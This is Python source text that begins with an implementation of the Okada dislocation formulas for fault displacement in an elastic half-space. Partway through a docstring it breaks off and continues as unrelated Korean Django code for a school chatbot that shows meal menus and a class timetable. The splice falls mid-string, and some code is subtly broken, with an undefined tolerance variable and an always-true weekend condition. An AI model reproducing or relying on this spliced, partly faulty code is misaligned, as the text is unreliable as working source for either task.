space\n about the z axis by argz, the y axis by argy, and the x axis by\n argx, in that order\n '''\n R1 = np.array([[ np.cos(argZ), -np.sin(argZ), 0.0],\n [ np.sin(argZ), np.cos(argZ), 0.0],\n [ 0.0, 0.0, 1.0]])\n\n R2 = np.array([[ np.cos(argY), 0.0, np.sin(argY)],\n [ 0.0, 1.0, 0.0],\n [ -np.sin(argY), 0.0, np.cos(argY)]])\n\n R3 = np.array([[ 1.0, 0.0, 0.0],\n [ 0.0, np.cos(argX), -np.sin(argX)],\n [ 0.0, np.sin(argX), np.cos(argX)]])\n return R1.dot(R2.dot(R3))\n\n\ndef dislocation(points,\n slip,\n anchor,\n length,\n width,\n strike,\n dip,\n output_type='disp',\n lamb=3.2e10,\n mu=3.2e10):\n '''\n wrapper for okada92 which handles coordinate system rotations\n and translations needed to describe faults not anchored at the \n origin and oriented along the x axis.\n\n Parameters\n ----------\n \n points: N by 3 array of coordinates where the displacements or \n displacement derivatives will be computed. The problem domain\n is all points where the z is less than or equal to zero (which\n is consistent with Okada 92)\n\n slip: length 3 array describing left-lateral, thrust, and tensile \n motion on the fault\n\n anchor: The position of the top corner of the fault patch where \n the fault is continuing in the strike direction\n\n length: length of the fault in the strike direction\n\n width: width of the fault in the dip direction\n \n strike: angle of the fault patch in radians with respect to the y\n axis (clockwise is positive). This is consistent with the strike\n which would be used for a east-north-vertical coordinate system\n\n dip: The angle of the fault patch with respect to horizontal. This\n is in radians and should be between 0 and pi/2\n\n output_type: either 'disp', 'dudx', 'dudy', or 'dudz'\n\n Returns\n -------\n \n N by 3 array of displacement or its derivatives\n\n Note\n ----\n\n This function does not check for points which lie on the fault \n edge where the solution is not defined. It is possible that\n numpy will print very verbose Runtime Warnings and return a nan\n or and inf and it is also possible that a finite value will be\n returned although it will still be meaningless. \n\n\n Usage\n -----\n\n In [0]: import matplotlib.pyplot as plt\n In [1]: from okada import dislocation\n In [2]: x = np.linspace(-10,10,20)\n In [3]: y = np.linspace(-10,10,20)\n In [4]: xgrid,ygrid = np.meshgrid(x,y)\n In [5]: x = xgrid.flatten()\n In [6]: y = ygrid.flatten()\n In [7]: z = 0*y\n In [8]: points = np.array([x,y,z]).transpose()\n In [9]: anchor = [-1.0,2.0,0.0]\n In [10]: length = 5\n In [11]: width = 1\n In [12]: strike = np.pi/8.0\n In [13]: slip = [1.0,0.0,0.0]\n In [14]: out = dislocation(points,slip,anchor,length,width,strike,dip)\n In [15]: plt.plot(x,y,out[:,0],out[:,1])\n In [16]: plt.show()\n\n '''\n # compute fault geometry parameters\n p = np.array(points,copy=True)\n anchor = np.asarray(anchor)\n slip = np.asarray(slip)\n\n # compute depth to fault bottom\n c = width*np.sin(dip) - anchor[2]\n \n # translate points so that the origin coincides with the top fault \n # corner in the coordinate system used by okada92\n p[:,[0,1]] -= anchor[[0,1]]\n\n # angle between current reference frame and reference frame used by\n # okada92 (i.e. x axis along strike direction)\n argZ = np.pi/2.0 - strike\n\n # rotation matrix which changes the reference frame to that used by\n # okada92 \n R = rotation_3d(-argZ,0.0,0.0)\n\n # rotate coordinate system of points\n p = np.einsum('ij,kj->ki',R,p)\n \n # shift along the dip direction so that the origin coincides with \n # the okada92 origin\n p[:,1] += width*np.cos(dip)\n\n out = okada92(p[:,0],p[:,1],p[:,2],\n slip,length,width,\n c,dip,output_type,lamb,mu) \n\n out = np.array(out).transpose()\n\n # the current output is in the okada92 coordinate system and needs\n # to be rotated back to the original \n R = rotation_3d(argZ,0.0,0.0)\n out = np.einsum('ij,kj->ki',R,out)\n\n return out\n\n\ndef okada92(x,y,z,U,L,W,c,delta,output,lamb=3.2e10,mu=3.2e10):\n '''\n computes displacements resulting from a rectangular dislocation in \n a 3-D halfspace. The notation used here coincides with that used \n by Okada 92. See figure 3 in Okada 92 for a schematic illustration\n of the input parameters. \n\n Parameters\n ----------\n \n x: 1-D array of length N containing x coordinates of output points\n\n y: 1-D array of length N containing y coordinates of output points\n\n z: 1-D array of length N containing z coordinates of output points\n\n U: length 3 sequence describing fault motion. The components \n describe left-lateral, thrust, and tensile motion\n\n c: Depth to the base of the fault (see figure 3 in Okada 92)\n\n delta: fault angle with respect to the horizontal plane. Values \n should be between 0 and pi/2\n\n output: type of output to produce. Either 'disp', 'dudx', 'dudy', \n or 'dudz' \n\n lamb: (optional) scalar for the first Lame parameter\n\n mu: (optional) scalar for the second Lame parameter\n \n Returns\n -------\n\n tuple where each components is a vector of either diplacement or \n displacement derivatives in the x, y, or z direction\n\n ''' \n sindel = np.sin(delta)\n cosdel = np.cos(delta)\n points = len(x)\n alpha = (lamb + mu)/(lamb + 2*mu)\n\n def f(eps,eta,zeta,term,direction):\n X = np.zeros(points)\n R = np.zeros(points)\n y_bar = np.zeros(points)\n c_bar = np.zeros(points)\n d_bar = np.zeros(points)\n X11 = np.zeros(points)\n X32 = np.zeros(points)\n X53 = np.zeros(points)\n Y11 = np.zeros(points)\n Y32 = np.zeros(points)\n Y53 = np.zeros(points)\n h = np.zeros(points)\n theta = np.zeros(points)\n logReps = np.zeros(points)\n logReta = np.zeros(points)\n I1 = np.zeros(points)\n I2 = np.zeros(points)\n I3 = np.zeros(points)\n I4 = np.zeros(points)\n K1 = np.zeros(points)\n K2 = np.zeros(points)\n K3 = np.zeros(points)\n K4 = np.zeros(points)\n D11 = np.zeros(points)\n J1 = np.zeros(points)\n J2 = np.zeros(points)\n J3 = np.zeros(points)\n J4 = np.zeros(points)\n J5 = np.zeros(points)\n J6 = np.zeros(points)\n E = np.zeros(points)\n F = np.zeros(points)\n G = np.zeros(points)\n H = np.zeros(points)\n P = np.zeros(points)\n Q = np.zeros(points)\n Ep = np.zeros(points)\n Fp = np.zeros(points)\n Gp = np.zeros(points)\n Hp = np.zeros(points)\n Pp = np.zeros(points)\n Qp = np.zeros(points)\n\n d = c - zeta\n p = y*cosdel + d*sindel\n q = y*sindel - d*cosdel\n R = np.sqrt(eps**2 + eta**2 + q**2)\n\n X = np.sqrt(eps**2 + q**2) \n y_bar = eta*cosdel + q*sindel\n d_bar = eta*sindel - q*cosdel\n c_bar = d_bar + zeta\n h = q*cosdel - zeta\n\n idx = np.abs(q) < tol \n nidx = np.abs(q) >= tol \n theta[nidx] = np.arctan(eps[nidx]*eta[nidx]/(q[nidx]*R[nidx]))\n\n idx = np.abs(R + eps) < tol\n nidx = np.abs(R + eps) >= tol\n X11[nidx] = 1.0/(R[nidx]*(R[nidx] + eps[nidx]))\n X32[nidx] = ((2*R[nidx] + eps[nidx])/(R[nidx]**3*\n (R[nidx] + eps[nidx])**2))\n X53[nidx] = ((8*R[nidx]**2 + 9*R[nidx]*eps[nidx] + \n 3*eps[nidx]**2)/(R[nidx]**5*\n (R[nidx] + eps[nidx])**3.0))\n logReps[idx] = -np.log(R[idx] - eps[idx]) \n logReps[nidx] = np.log(R[nidx] + eps[nidx]) \n\n idx = np.abs(R + eta) < tol\n nidx = np.abs(R + eta) >= tol\n Y11[nidx] = 1.0/(R[nidx]*(R[nidx] + eta[nidx]))\n Y32[nidx] = ((2*R[nidx] + eta[nidx])/(R[nidx]**3*\n (R[nidx] + eta[nidx])**2))\n Y53[nidx] = ((8*R[nidx]**2 + 9*R[nidx]*eta[nidx] + \n 3*eta[nidx]**2)/(R[nidx]**5*\n ((R[nidx] + eta[nidx])**3)))\n logReta[idx] = -np.log(R[idx] - eta[idx])\n logReta[nidx] = np.log(R[nidx] + eta[nidx])\n \n if np.abs(cosdel) >= tol:\n I3 = (y_bar/(cosdel*(R + d_bar)) - 1/cosdel**2*\n (logReta - sindel*np.log(R + d_bar)))\n nidx = np.abs(eps) >= tol\n idx = np.abs(eps) < tol\n I4[nidx] = ((sindel*eps[nidx])/(cosdel*(R[nidx] + d_bar[nidx])) + \n 2.0/cosdel**2*\n np.arctan((eta[nidx]*(X[nidx] + q[nidx]*cosdel) + \n X[nidx]*(R[nidx] + X[nidx])*sindel)/\n (eps[nidx]*(R[nidx] + X[nidx])*cosdel)))\n I4[idx] = (0.5*(eps[idx]*y_bar[idx])/\n (R[idx] + d_bar[idx])**2.0) \n else:\n I3 = (0.5*(eta/(R + d_bar) + (y_bar*q)/\n (R + d_bar)**2 - logReta))\n I4 = 0.5*(eps*y_bar)/(R + d_bar)**2 \n\n\n I2 = np.log(R + d_bar) + I3*sindel\n I1 = -eps/(R + d_bar)*cosdel - I4*sindel\n Y0 = Y11 - eps**2*Y32\n Z32 = sindel/R**3 - h*Y32\n Z53 = 3*sindel/R**5 - h*Y53\n Z0 = Z32 - eps**2*Z53\n \n D11 = 1.0/(R*(R + d_bar))\n J2 = eps*y_bar/(R + d_bar)*D11\n J5 = -(d_bar + y_bar**2/(R + d_bar))*D11\n\n if np.abs(cosdel) >= tol:\n K1 = eps/cosdel*(D11 - Y11*sindel)\n K3 = 1.0/cosdel*(q*Y11 - y_bar*D11)\n J3 = 1.0/cosdel*(K1 - J2*sindel)\n J6 = 1.0/cosdel*(K3 - J5*sindel)\n else:\n K1 = eps*q/(R + d_bar)*D11\n K3 = (sindel/(R + d_bar)*\n (eps**2*D11 - 1))\n J3 = (-eps/(R + d_bar)**2*\n (q**2*D11 - 0.5))\n J6 = (-y_bar/(R + d_bar)**2*\n (eps**2*D11 - 0.5))\n \n K4 = eps*Y11*cosdel - K1*sindel\n K2 = 1.0/R + K3*sindel\n J4 = -eps*Y11 - J2*cosdel + J3*sindel\n J1 = J5*cosdel - J6*sindel\n E = sindel/R - y_bar*q/R**3\n F = d_bar/R**3 + eps**2*Y32*sindel\n G = 2.0*X11*sindel - y_bar*q*X32\n H = d_bar*q*X32 + eps*q*Y32*sindel\n P = cosdel/R**3 + q*Y32*sindel\n Q = 3*c_bar*d_bar/R**5 - (zeta*Y32 + Z32 + Z0)*sindel\n Ep = cosdel/R + d_bar*q/R**3\n Fp = y_bar/R**3 + eps**2*Y32*cosdel\n Gp = 2.0*X11*cosdel + d_bar*q*X32\n Hp = y_bar*q*X32 + eps*q*Y32*cosdel\n Pp = sindel/R**3 - q*Y32*cosdel\n Qp = (3*c_bar*y_bar/R**5 + \n q*Y32 - (zeta*Y32 + Z32 + Z0)*cosdel)\n\n if output == 'disp':\n if direction == 'strike':\n if term == 'A':\n f1 = theta/2.0 + alpha/2.0*eps*q*Y11 \n f2 = alpha/2.0*q/R\n f3 = (1-alpha)/2.0*logReta - alpha/2.0*q**2*Y11\n if term == 'B':\n f1 = -eps*q*Y11 - theta - (1- alpha)/alpha*I1*sindel\n f2 = -q/R + (1-alpha)/alpha*y_bar/(R+d_bar)*sindel\n f3 = q**2*Y11 - (1 - alpha)/alpha*I2*sindel\n if term == 'C':\n f1 = (1-alpha)*eps*Y11*cosdel - alpha*eps*q*Z32\n f2 = ((1-alpha)*(cosdel/R + 2*q*Y11*sindel) - \n alpha*c_bar*q/R**3)\n f3 = ((1-alpha)*q*Y11*cosdel - alpha*(c_bar*eta/R**3 - \n zeta*Y11 + eps**2*Z32))\n if direction == 'dip':\n if term == 'A':\n f1 = alpha/2.0*q/R\n f2 = theta/2.0 + alpha/2.0*eta*q*X11\n f3 = (1-alpha)/2.0*logReps - alpha/2.0*q**2*X11\n if term == 'B':\n f1 = -q/R + (1 - alpha)/alpha*I3*sindel*cosdel\n f2 = (-eta*q*X11 - theta - (1-alpha)/alpha*\n eps/(R + d_bar)*sindel*cosdel)\n f3 = q**2*X11 + (1-alpha)/alpha*I4*sindel*cosdel\n if term == 'C':\n f1 = ((1-alpha)*cosdel/R - q*Y11*sindel - alpha*c_bar*q/R**3)\n f2 = (1 - alpha)*y_bar*X11 - alpha*c_bar*eta*q*X32\n f3 = (-d_bar*X11 - eps*Y11*sindel - \n alpha*c_bar*(X11 - q**2*X32))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*logReta - alpha/2.0*q**2*Y11\n f2 = -(1 - alpha)/2.0*logReps - alpha/2.0*q**2*X11\n f3 = theta/2.0 - alpha/2.0*q*(eta*X11 + eps*Y11)\n if term == 'B':\n f1 = q**2*Y11 - (1 - alpha)/alpha*I3*sindel**2 \n f2 = (q**2*X11 + \n (1 - alpha)/alpha*eps / (R + d_bar)*sindel**2)\n f3 = (q*(eta*X11 + eps*Y11) - theta - \n (1 - alpha)/alpha*I4*sindel**2)\n if term == 'C':\n f1 = (-(1 - alpha)*(sindel/R + q*Y11*cosdel) - \n alpha*(zeta*Y11 - q**2*Z32))\n f2 = ((1 - alpha)*2.0*eps*Y11 *sindel + d_bar*X11 - \n alpha*c_bar*(X11 - q**2*X32))\n f3 = ((1 - alpha)*(y_bar*X11 + eps*Y11*cosdel) + \n alpha*q*(c_bar*eta*X32 + eps*Z32))\n\n if output == 'dudx':\n if direction == 'strike':\n if term == 'A':\n f1 = -(1-alpha)/2.0*q*Y11 - alpha/2.0*eps**2*q*Y32\n f2 = -alpha/2.0*eps*q/R**3\n f3 = (1 - alpha)/2.0*eps*Y11 + alpha/2.0*eps*q**2*Y32\n if term == 'B':\n f1 = eps**2*q*Y32 -(1 - alpha)/alpha*J1*sindel\n f2 = eps*q/R**3 -(1 - alpha)/alpha*J2*sindel\n f3 = -eps*q**2*Y32 -(1 - alpha)/alpha*J3*sindel\n if term == 'C':\n f1 = (1 - alpha)*Y0*cosdel - alpha*q*Z0\n f2 = (-(1 - alpha) *eps*(cosdel/R**3 + \n 2.0*q*Y32*sindel) + alpha* 3.0*c_bar*eps*q/R**5)\n f3 = (-(1 - alpha)*eps*q*Y32*cosdel + \n alpha*eps*(3.0*c_bar*eta/R**5 - zeta*Y32 - Z32 - Z0))\n if direction == 'dip':\n if term == 'A':\n f1 = -alpha/2.0*eps*q/R**3\n f2 = -q/2.0*Y11 - alpha/2.0*eta*q/R**3\n f3 = (1 - alpha)/2.0*1.0/R + alpha/2.0*q**2/R**3\n if term == 'B':\n f1 = eps*q/R**3 + (1 - alpha)/alpha*J4*sindel*cosdel\n f2 = (eta*q/R**3 + q*Y11 + \n (1 - alpha)/alpha*J5*sindel*cosdel)\n f3 = (-q**2/R**3 + (1- alpha)/alpha*J6*sindel*cosdel)\n if term == 'C':\n f1 = (-(1 - alpha)* eps/R**3*cosdel + \n eps*q*Y32*sindel + alpha*3*c_bar*eps*q/R**5)\n f2 = (-(1 - alpha)* y_bar/R**3 + alpha*3*c_bar*eta*q/R**5)\n f3 = (d_bar/R**3 - Y0*sindel + alpha*c_bar/R**3*(1 - 3*q**2/R**2))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*eps*Y11 + alpha/2.0*eps*q**2*Y32\n f2 = (-(1 - alpha)/2.0*1.0/R + alpha/2.0*q**2/R**3)\n f3 = -(1 - alpha)/2.0*q*Y11 - alpha/2.0*q**3*Y32\n if term == 'B':\n f1 = (-eps*q**2*Y32 - (1 - alpha)/alpha*J4*sindel**2)\n f2 = (-q**2/R**3 - (1 - alpha)/alpha*J5*sindel**2)\n f3 = q**3*Y32 - (1 - alpha)/alpha*J6*sindel**2\n if term == 'C':\n f1 = ((1 - alpha)*eps/R**3*sindel + eps*q*Y32*cosdel + \n alpha*eps*(3*c_bar*eta/R**5 - 2.0*Z32 - Z0))\n f2 = ((1 - alpha)*2.0*Y0*sindel - d_bar/R**3 + \n alpha*c_bar/R**3*(1 - 3.0*q**2/R**2))\n f3 = (-(1- alpha)*(y_bar/R**3 - Y0*cosdel) - \n alpha*(3*c_bar*eta*q/R**5 - q *Z0))\n \n if output == 'dudy':\n if direction == 'strike':\n if term == 'A':\n f1 = (1-alpha)/2.0*eps*Y11*sindel + d_bar/2.0*X11 + alpha/2.0*eps *F\n f2 = alpha/2.0*E\n f3 = (1 - alpha)/2.0*(cosdel/R + q*Y11*sindel) - alpha/2.0*q*F\n if term == 'B':\n f1 = -eps*F - d_bar*X11 + (1- alpha)/alpha*(eps*Y11 + J4)*sindel\n f2 = -E + (1- alpha)/alpha*(1.0/R + J5)*sindel\n f3 = q*F - (1 - alpha)/alpha*(q*Y11 - J6)*sindel\n if term == 'C':\n f1 = -(1.0 - alpha)*eps*P*cosdel - alpha*eps*Q\n f2 = (2*(1.0 - alpha)*(d_bar/R**3 - Y0*sindel)*sindel - \n y_bar/R**3*cosdel - \n alpha*((c_bar + d_bar)/R**3*sindel - \n eta/R**3 - 3.0*c_bar*y_bar*q/R**5))\n f3 = (-(1-alpha)*q/R**3 + \n (y_bar/R**3 - Y0*cosdel)*sindel + \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3.0*c_bar*d_bar*q/R**5 - (Y0*cosdel + q*Z0)*sindel))\n if direction == 'dip':\n if term == 'A':\n f1 = alpha/2.0*E\n f2 = (1 -alpha)/2.0*d_bar*X11 + eps/2.0*Y11*sindel + alpha/2.0*eta*G\n f3 = (1 -alpha)/2.0*y_bar*X11- alpha/2.0*q*G\n if term == 'B':\n f1 = -E + (1- alpha)/alpha*J1*sindel*cosdel\n f2 = -eta*G - eps*Y11*sindel + (1- alpha)/alpha*J2*sindel*cosdel\n f3 = q*G + (1- alpha)/alpha*J3*sindel*cosdel\n if term == 'C':\n f1 = (-(1 - alpha)*eta/R**3 + Y0*sindel**2 - \n alpha*((c_bar+d_bar)/R**3*sindel - \n 3*c_bar*y_bar*q/R**5))\n f2 = ((1 - alpha)*(X11 - y_bar**2*X32) - \n alpha*c_bar*((d_bar + 2.0*q*cosdel)*X32 - y_bar*eta*q*X53))\n f3 = (eps*P*sindel + y_bar*d_bar*X32 + \n alpha*c_bar*((y_bar + 2*q*sindel)*X32 - \n y_bar*q**2*X53))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*(cosdel/R + q*Y11*sindel) - alpha/2.0*q*F\n f2 = -(1 - alpha)/2.0*y_bar*X11 - alpha/2.0*q*G\n f3 = (1 - alpha)/2.0*(d_bar*X11 + eps*Y11*sindel) + alpha/2.0*q*H\n if term == 'B':\n f1 = q*F - (1- alpha)/alpha*J1*sindel**2\n f2 = q*G - (1- alpha)/alpha*J2*sindel**2\n f3 = -q*H - (1- alpha)/alpha*J3*sindel**2\n if term == 'C':\n f1 = ((1 - alpha)*(q/R**3 + Y0*sindel*cosdel) + \n alpha*(zeta/R**3*cosdel + \n 3.0*c_bar*d_bar*q/R**5 - q*Z0*sindel))\n f2 = (-(1-alpha)*2.0*eps*P*sindel - y_bar*d_bar*X32 + \n alpha*c_bar*((y_bar + 2.0*q*sindel)*X32 - \n y_bar*q**2*X53))\n f3 = (-(1 - alpha)*(eps*P*cosdel - X11 + y_bar**2*X32) + \n alpha*c_bar*((d_bar + 2.0*q*cosdel)*X32 - y_bar*eta*q*X53) + \n alpha*eps*Q)\n\n if output == 'dudz':\n if direction == 'strike':\n if term == 'A':\n f1 = ((1 - alpha)/2.0*eps *Y11*cosdel + y_bar/2.0*X11 + \n alpha/2.0*eps*Fp)\n f2 = alpha/2.0*Ep\n f3 = -(1 - alpha)/2.0*(sindel/R - q*Y11*cosdel) - alpha/2.0*q*Fp\n if term == 'B':\n f1 = -eps*Fp - y_bar*X11 + (1 - alpha)/alpha*K1*sindel\n f2 = -Ep + (1 - alpha)/alpha*y_bar*D11*sindel\n f3 = q*Fp + (1 - alpha)/alpha*K2*sindel\n if term == 'C':\n f1 = (1 - alpha)*eps*Pp*cosdel - alpha*eps*Qp\n f2 = (2*(1-alpha)*(y_bar/R**3 - Y0*cosdel)*sindel + \n d_bar/R**3*cosdel - \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3*c_bar*d_bar*q/R**5))\n f3 = ((y_bar/R**3 - Y0*cosdel)*cosdel - \n alpha*((c_bar + d_bar)/R**3*sindel - \n 3*c_bar*y_bar*q/R**5 - Y0*sindel**2 + \n q*Z0*cosdel))\n if term == 'D':\n f1 = (1-alpha)*eps*Y11*cosdel - alpha*eps*q*Z32\n f2 = ((1-alpha)*(cosdel/R + 2*q*Y11*sindel) - \n alpha*c_bar*q/R**3)\n f3 = ((1-alpha)*q*Y11*cosdel - \n alpha*(c_bar*eta/R**3 - \n zeta*Y11 + eps**2*Z32))\n\n if direction == 'dip':\n if term == 'A':\n f1 = alpha/2.0*Ep\n f2 = (1 - alpha)/2.0*y_bar*X11 + eps/2.0*Y11*cosdel + alpha/2.0*eta*Gp\n f3 = -(1 - alpha)/2.0*d_bar*X11 - alpha/2.0*q*Gp\n if term == 'B':\n f1 = -Ep - (1 - alpha)/alpha*K3*sindel*cosdel\n f2 = (-eta*Gp - eps*Y11*cosdel - \n (1 - alpha)/alpha*eps*D11*sindel*cosdel)\n f3 = q*Gp - (1 - alpha)/alpha*K4*sindel*cosdel\n if term == 'C':\n f1 = (-q/R**3 + Y0*sindel*cosdel - \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3*c_bar*d_bar*q/R**5))\n f2 = ((1 - alpha)*y_bar*d_bar*X32 - \n alpha*c_bar*((y_bar - 2*q*sindel)*X32 + d_bar*eta*q*X53))\n f3 = (-eps*Pp*sindel + X11 - d_bar**2*X32 - \n alpha*c_bar*((d_bar - 2*q*cosdel)*X32 - \n d_bar*q**2*X53))\n if term == 'D':\n f1 = ((1-alpha)*cosdel/R - q*Y11*sindel - \n alpha*c_bar*q/R**3)\n f2 = (1 - alpha)*y_bar*X11 - alpha*c_bar*eta*q*X32\n f3 = (-d_bar*X11 - eps*Y11*sindel - \n alpha*c_bar*(X11 - q**2*X32))\n if direction == 'tensile':\n if term == 'A':\n f1 = (1 - alpha)/2.0*(sindel/R - q*Y11*cosdel) - alpha/2.0*q*Fp\n f2 = (1 - alpha)/2.0*d_bar*X11 - alpha/2.0*q*Gp\n f3 = (1 - alpha)/2.0*(y_bar*X11 + eps*Y11*cosdel) + alpha/2.0*q*Hp\n if term == 'B':\n f1 = q*Fp + (1 - alpha)/alpha*K3*sindel**2\n f2 = q*Gp + (1 - alpha)/alpha*eps*D11*sindel**2\n f3 = -q*Hp + (1 - alpha)/alpha*K4*sindel**2\n if term == 'C':\n f1 = (-eta/R**3 + Y0*cosdel**2 - \n alpha*(zeta/R**3*sindel- \n 3*c_bar*y_bar*q/R**5 - \n Y0*sindel**2 + q*Z0*cosdel))\n f2 = ((1 - alpha)*2*eps*Pp*sindel - X11 + d_bar**2*X32 - \n alpha*c_bar*((d_bar - 2*q*cosdel)*X32 - \n d_bar*q**2*X53))\n f3 = ((1 - alpha)*(eps*Pp*cosdel + y_bar*d_bar*X32) + \n alpha*c_bar*((y_bar - 2*q*sindel)*X32 + d_bar*eta*q*X53) + \n alpha*eps*Qp)\n if term == 'D':\n f1 = (-(1 - alpha)*(sindel/R + q*Y11*cosdel) - \n alpha*(zeta*Y11 - q**2*Z32))\n f2 = ((1 - alpha)*2.0*eps*Y11 *sindel + d_bar*X11 - \n alpha*c_bar*(X11 - q**2*X32))\n f3 = ((1 - alpha)*(y_bar*X11 + eps*Y11*cosdel) + \n alpha*q*(c_bar*eta*X32 + eps*Z32))\n return (f1,f2,f3)\n\n ux = np.zeros(points)\n uy = np.zeros(points)\n uz = np.zeros(points)\n for itr,direction in enumerate(['strike','dip','tensile']):\n p = y*cosdel + (c - z)*sindel\n p_ = y*cosdel + (c + z)*sindel # it is unclear if p_ is needed\n # based on the text. \n fI = f(x,p,z,'A',direction) \n fII = f(x,p - W,z,'A',direction)\n fIII = f(x-L,p,z,'A',direction)\n fIV = f(x-L,p - W,z,'A',direction)\n uA1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uA2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uA3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p_,-z,'A',direction)\n fII = f(x,p_ - W,-z,'A',direction)\n fIII = f(x-L,p_,-z,'A',direction)\n fIV = f(x-L,p_ - W,-z,'A',direction)\n uhatA1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uhatA2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uhatA3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p,z,'B',direction)\n fII = f(x,p - W,z,'B',direction)\n fIII = f(x-L,p,z,'B',direction)\n fIV = f(x-L,p - W,z,'B',direction)\n uB1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uB2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uB3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p,z,'C',direction)\n fII = f(x,p - W,z,'C',direction)\n fIII = f(x-L,p,z,'C',direction)\n fIV = f(x-L,p - W,z,'C',direction)\n uC1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uC2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uC3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n if output == 'dudz':\n fI = f(x,p,z,'D',direction)\n fII = f(x,p - W,z,'D',direction)\n fIII = f(x-L,p,z,'D',direction)\n fIV = f(x-L,p - W,z,'D',direction)\n uD1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uD2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uD3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n ux += U[itr]/(2*np.pi)*(uA1 + uhatA1 + uB1 + uD1 + z*uC1)\n uy += (U[itr]/(2*np.pi)*((uA2 + uhatA2 + uB2 + uD2 + z*uC2)*cosdel - \n (uA3 + uhatA3 + uB3 + uD3 + z*uC3)*sindel))\n uz += (U[itr]/(2*np.pi)*((uA2 + uhatA2 + uB2 - uD2 - z*uC2)*sindel + \n (uA3 + uhatA3 + uB3 - uD3 - z*uC3)*cosdel))\n else:\n ux += U[itr]/(2*np.pi)*(uA1 - uhatA1 + uB1 + z*uC1)\n uy += (U[itr]/(2*np.pi)*((uA2 - uhatA2 + uB2 + z*uC2)*cosdel - \n (uA3 - uhatA3 + uB3 + z*uC3)*sindel))\n uz += (U[itr]/(2*np.pi)*((uA2 - uhatA2 + uB2 - z*uC2)*sindel + \n (uA3 - uhatA3 + uB3 - z*uC3)*cosdel))\n\n return np.array([ux,uy,uz]) \n\n##------------------------------------------------------------------\ndef okada85(x,y,L,W,d,delta,U): \n ''' \n Description: \n computes displacements at points (x,y) for a fault with \n width W, length L, and depth d. The fault has one end on the \n origin and the other end at (x=L,y=0). Slip on the fault is \n described by U. \n Arguments: \n x: along strike coordinate of output locations (can be a vector) \n y: perpendicular to strike coordinate of output locations (can be a vector) \n L: length of fault \n W: width of fault \n d: depth of the bottom of the fault (a fault which ruptures the surface \n with have d=W, and d', '&', '(h)', '.']\n for element_string in element_filter :\n element = element.replace(element_string, '')\n #줄 바꿈 처리\n element = element.replace('
    ', '\\n')\n #모든 공백 삭제\n element = re.sub(r\"\\d\", \"\", element)\n\n #급식이 없을 경우\n except:\n element = \"급식이 먹고싶나?\\n급식이 없다네 핳핳\" # 공백 반환\n return element\n \n#meal = get_diet(2, \"2018.06.15\", 4) #중식, 2017년 11월 17일, 금요일\nmeal1 = get_diet(2, todate, r) #중식, 2017년 11월 17일, 금요일\nmeal2 = get_diet(3, todate, r)\n\nmealD = \"\"\nmealM = \"\"\nbar = \"=====오늘의 급식=====\\n\"\nerror = \"주말과 공휴일에는\\n아무것도 나타나지 않아욥!\"\nmealM += todate+ t[r] + \"요일\\n\" + bar + \"중식\\n\"+ meal1+ bar + error\nmealD += todate+ t[r] + \"요일\\n\" + bar + \"석식\\n\" + meal2 +bar + error\n#========================================오늘의급식end\nsub = t[r] + \"요일 시간표\\n\"\nbar = \"==========\\n\"\ndanger = \"시간표가변경될수있습니다.\"\n\nif t[r] == \"월\":\n classTime = \"1 . 물리\\n2. 생물\\n3. 미적\\n4. 미술\\n5. 영A\\n6. 문A\\n7. 문C\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"화\":\n classTime = \"1 . 미적\\n2. 영A\\n3. 문B\\n4. 일본어/중국어\\n5. 체육A\\n6. 진로\\n7. 화학\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"수\":\n classTime = \"1 . 지구과학\\n2. 문A\\n3. 물리\\n4. 미술\\n5. 일본어/중국어\\n6. 미적A\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"목\":\n classTime = \"1 . 체육\\n2. 일본어/중국어\\n3. 미적\\n4. 영B\\n5. 미적\\n6. 지구과학\\n7. 문B\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"금\":\n classTime = \"1 . 미적\\n2. 화학\\n3. 생물\\n4. 영A\\n5. 창체\\n6. 창체\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"토\" or \"일\":\n classTime = \"토,일요일은 수업이 없습니다\\n\"\n class26 = sub + bar + classTime + bar + danger\n#=================================class26end\n\ndef keyboard(request):\n\n return JsonResponse({\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n })\n\n@csrf_exempt\ndef message(request):\n\n json_str = ((request.body).decode('utf-8'))\n received_json_data = json.loads(json_str)\n datacontent = received_json_data['content']\n\n if datacontent == '오늘급식':\n\n return JsonResponse({\n 'message': {\n 'text': '아래 중식, 석식중 선택하세요'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['중식','석식']\n }\n\n })\n\n elif datacontent == '오늘의명언':\n\n return JsonResponse({\n 'message': {\n 'text': '환곤이 일했는데오류나요...'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n\n elif datacontent == '개발하기까지':\n\n return JsonResponse({\n 'message': {\n 'text': '검색,구상,실현 : 서정현,장환곤\\n항상 조언해주시는 : 갓주현쌤\\n부스운영하러 오셔서 많은정보주신 효진이형\\n>모두 감사드립니다.'\n },\n 'keyboard': {\n 'type':'buttons',\n 